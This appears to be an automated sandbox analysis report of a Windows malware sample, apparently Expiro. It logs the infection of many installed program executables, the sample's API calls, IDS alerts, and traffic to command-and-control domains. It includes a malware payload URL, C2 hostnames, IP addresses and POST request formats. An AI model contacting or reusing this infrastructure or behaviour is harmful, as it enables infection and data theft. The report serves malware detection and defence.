                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\alg.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D152823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF7D152823C
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1522978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF7D1522978
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1511560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF7D1511560
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15135B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF7D15135B8
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1537B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF7D1537B4C
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D152823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,8_2_00007FF7D152823C
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1522978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,8_2_00007FF7D1522978
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1511560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,8_2_00007FF7D1511560
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D15135B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,8_2_00007FF7D15135B8
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1537B4C FindFirstFileW,FindNextFileW,FindClose,8_2_00007FF7D1537B4C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F138D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F138D440
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,9_2_00007FF7F13CD4A4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,9_2_00007FF7F13CB3D8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1403674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,9_2_00007FF7F1403674
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1421B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,9_2_00007FF7F1421B04
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14219F8 #359,FindFirstFileW,FindNextFileW,FindClose,9_2_00007FF7F14219F8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,9_2_00007FF7F13CDBC0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,9_2_00007FF7F13C5E58
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F142234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,9_2_00007FF7F142234C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13BC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,9_2_00007FF7F13BC6F8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1423100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,9_2_00007FF7F1423100
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14210C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,9_2_00007FF7F14210C4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1426F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,9_2_00007FF7F1426F80
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EA5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,15_2_02EA5908
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe

                    Networking

                    Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49914 -> 54.244.188.177:80
                    Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.7:60092 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.7:59465 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.7:50248 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.7:50501 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:50028 -> 82.112.184.197:80
                    Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.7:54567 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.7:54507 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.7:61118 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:50132 -> 72.52.178.23:80
                    Source: Network trafficSuricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.7:53758 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.7:59218 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:60112 -> 172.234.222.143:80
                    Source: Network trafficSuricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.7:55773 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.7:52819 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.7:55589 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.7:58751 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.7:51980 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.7:50242 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.7:62510 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.7:65464 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.7:53926 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.7:53053 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.7:57165 -> 1.1.1.1:53
                    Source: Malware configuration extractorURLs: https://gxe0.com/yak2/233_Juqmtmyadyy
                    Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
                    Source: unknownNetwork traffic detected: DNS query count 131
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EBE4B8 InternetCheckConnectionA,15_2_02EBE4B8
                    Source: global trafficTCP traffic: 192.168.2.7:49922 -> 51.195.88.199:587
                    Source: global trafficDNS traffic detected: number of DNS queries: 131
                    Source: Joe Sandbox ViewIP Address: 3.254.94.185 3.254.94.185
                    Source: Joe Sandbox ViewIP Address: 3.94.10.34 3.94.10.34
                    Source: unknownDNS query: name: api.ipify.org
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 198.252.105.91:443
                    Source: global traffic | HTTP traffic detected: GET /yak2/233_Juqmtmyadyy HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                        Host: gxe0.com
                    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Host: api.ipify.org
                        Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /nfkpu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /fkgxppcjxls HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /ayxmva HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /eoxlhmklnxbyibsu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /clakqqe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /wlytwhn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /nnuy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /fflfjsnvrvmguebc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /sv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /nvkbktvsplwlkgem HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /smwfchek HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /sywxrbcrkxovprj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /pgswneolngwqmbma HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /ufwhu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /dinrksxkdm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /pntkcm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /ovpu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /cqtkpvwafc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /n HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /cuqmfcku HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
